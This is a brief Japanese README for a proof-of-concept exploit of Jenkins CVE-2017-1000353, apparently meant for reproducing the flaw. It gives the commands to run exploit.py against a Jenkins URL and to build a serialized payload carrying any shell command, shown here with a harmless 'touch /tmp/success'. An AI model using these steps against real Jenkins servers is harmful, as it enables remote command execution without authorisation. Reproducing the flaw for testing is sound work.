
jenkins CVE-2017-1000353 POC
Jenkins CVE-2017-1000353 を再現する方法?
このリポジトリをクローンし、以下のコマンドでビルド済みペイロード jenkins_poc.ser を使用します:
python exploit.py http://your-ip:8080 jenkins_poc.ser
すると、touch /tmp/success が実行されます。
重要: ペイロードの生成は Java のバージョンに依存します。openjdk:8u292 で正常にテストされています。他の Java バージョンでは、ペイロードの生成と悪用が正しく機能しない場合があります。
jenkins_poc.ser を生成する方法?CVE-2017-1000353-SNAPSHOT-all.jar をダウンロードします。
java -jar CVE-2017-1000353-SNAPSHOT-all.jar jenkins_poc.ser "touch /tmp/success"
Docker を使用している場合は、互換性を確保するために以下のコマンドを使用できます:
docker run --rm -v $(pwd):/work -w /work openjdk:8u292 java -jar CVE-2017-1000353-SNAPSHOT-all.jar jenkins_poc.ser "touch /tmp/success"